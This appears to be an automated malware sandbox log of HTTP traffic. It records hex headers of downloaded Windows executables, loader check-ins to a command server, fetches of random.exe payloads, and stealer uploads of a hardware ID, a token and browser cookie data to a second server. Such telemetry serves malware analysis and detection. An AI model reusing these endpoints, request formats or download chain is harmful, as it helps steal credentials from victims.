00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 25 fb 02 00 00 40 25 00 00 fc 02 00 00 1e 25 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 1c 7f 00 00 00 40 28 00 00 80 00 00 00 1a 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 11:57:10 GMTContent-Type: application/octet-streamContent-Length: 2969600Last-Modified: Sat, 14 Dec 2024 10:56:36 GMTConnection: keep-aliveETag: "675d6464-2d5000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 00 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 31 00 00 04 00 00 ad 3d 2e 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 44 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec e5 30 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c e5 30 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 44 03 00 00 00 90 06 00 00 04 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 62 6b 63 72 74 6f 63 65 00 40 2a 00 00 b0 06 00 00 36 2a 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 6d 68 69 67 65 6c 61 00 10 00 00 00 f0 30 00 00 04 00 00 00 2a 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 00 31 00 00 22 00 00 00 2e 2d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 12:00:18 GMTContent-Type: application/octet-streamContent-Length: 970240Last-Modified: Sat, 14 Dec 2024 11:58:17 GMTConnection: keep-aliveETag: "675d72d9-ece00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 d1 72 5d 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 1e 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 30 0f 00 00 04 00 00 a3 83 0f 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 ec 62 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 0e 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 ec 62 01 00 00 40 0d 00 00 64 01 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 b0 0e 00 00 76 00 00 00 58 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 12:00:25 GMTContent-Type: application/octet-streamContent-Length: 1828864Last-Modified: Sat, 14 Dec 2024 11:59:36 GMTConnection: keep-aliveETag: "675d7328-1be800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 70 6a 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 a0 6a 00 00 04 00 00 10 b7 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4d b0 24 00 61 00 00 00 00 a0 24 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 b1 24 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 90 24 00 00 10 00 00 00 68 01 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 a0 24 00 00 02 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 b0 24 00 00 02 00 00 00 7a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 50 2b 00 00 c0 24 00 00 02 00 00 00 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 76 64 74 67 68 73 71 75 00 50 1a 00 00 10 50 00 00 42 1a 00 00 7e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 63 79 78 73 6e 74 73 6e 00 10 00 00 00 60 6a 00 00 06 00 00 00 c0 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 70 6a 00 00 22 00 00 00 c6 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 14 Dec 2024 12:00:34 GMTContent-Type: application/octet-streamContent-Length: 2740224Last-Modified: Sat, 14 Dec 2024 11:58:43 GMTConnection: keep-aliveETag: "675d72f3-29d000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 7a 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 50 28 2c 65 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 24 00 00 00 08 00 00 00 00 00 00 00 40 2a 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 2a 00 00 04 00 00 8d 0b 2a 00 02 00 60 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 55 80 00 00 69 00 00 00 00 60 00 00 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 81 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 40 00 00 00 20 00 00 00 12 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 05 00 00 00 60 00 00 00 06 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 20 00 00 00 80 00 00 00 02 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 79 66 75 65 71 6b 65 65 00 80 29 00 00 a0 00 00 00 70 29 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 79 6d 70 61 6b 74 6c 75 00 20 00 00 00 20 2a 00 00 04 00 00 00 aa 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 40 00 00 00 40 2a 00 00 22 00 00 00 ae 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /detct0r HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 31 32 37 37 31 42 31 35 39 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7BB12771B15982D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic	HTTP traffic detected: GET /files/6530775752/PK13K1G.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 34 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015146001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 36 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015166001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 36 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015167001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GDBFBFCBFBKECAAKJKFBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 38 41 45 30 32 34 37 44 38 42 43 34 31 35 38 31 33 35 32 33 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 74 6f 6b 0d 0a 2d 2d 2d 2d 2d 2d 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 42 2d 2d 0d 0a Data Ascii: ------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="hwid"08AE0247D8BC4158135236------GDBFBFCBFBKECAAKJKFBContent-Disposition: form-data; name="build"stok------GDBFBFCBFBKECAAKJKFB--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GCGHIIDHCGHCAAAAAFIJHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 49 49 44 48 43 47 48 43 41 41 41 41 41 46 49 4a 2d 2d 0d 0a Data Ascii: ------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------GCGHIIDHCGHCAAAAAFIJContent-Disposition: form-data; name="message"browsers------GCGHIIDHCGHCAAAAAFIJ--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHCGIIDGDAKFIEBKFCFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 43 47 48 43 47 49 49 44 47 44 41 4b 46 49 45 42 4b 46 43 46 2d 2d 0d 0a Data Ascii: ------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------CGHCGIIDGDAKFIEBKFCFContent-Disposition: form-data; name="message"plugins------CGHCGIIDGDAKFIEBKFCF--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JDHIEBFHCAKEHIDGHCBAHost: 185.215.113.206Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 48 49 45 42 46 48 43 41 4b 45 48 49 44 47 48 43 42 41 2d 2d 0d 0a Data Ascii: ------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="token"6931d81a8c318b5417b8f44236a385a9ba0fd75f799689d43bcae85f4985df2347e12401------JDHIEBFHCAKEHIDGHCBAContent-Disposition: form-data; name="message"fplugins------JDHIEBFHCAKEHIDGHCBA--
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJDAECAEBKJJJKEBKKJDHost: 185.215.113.206Content-Length: 6851Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /68b591d6548ec281/sqlite3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 31 35 31 36 38 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1015168001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/burpin1/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic	HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKFHIIEHIEGDHJJJKFIIHost: 185.215.113.206Content-Length: 419Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 39 33 31 64 38 31 61 38 63 33 31 38 62 35 34 31 37 62 38 66 34 34 32 33 36 61 33 38 35 61 39 62 61 30 66 64 37 35 66 37 39 39 36 38 39 64 34 33 62 63 61 65 38 35 66 34 39 38 35 64 66 32 33 34 37 65 31 32 34 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 48 49 49 45 48 49 45 47 44 48 4a 4a 4a 4b 46 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 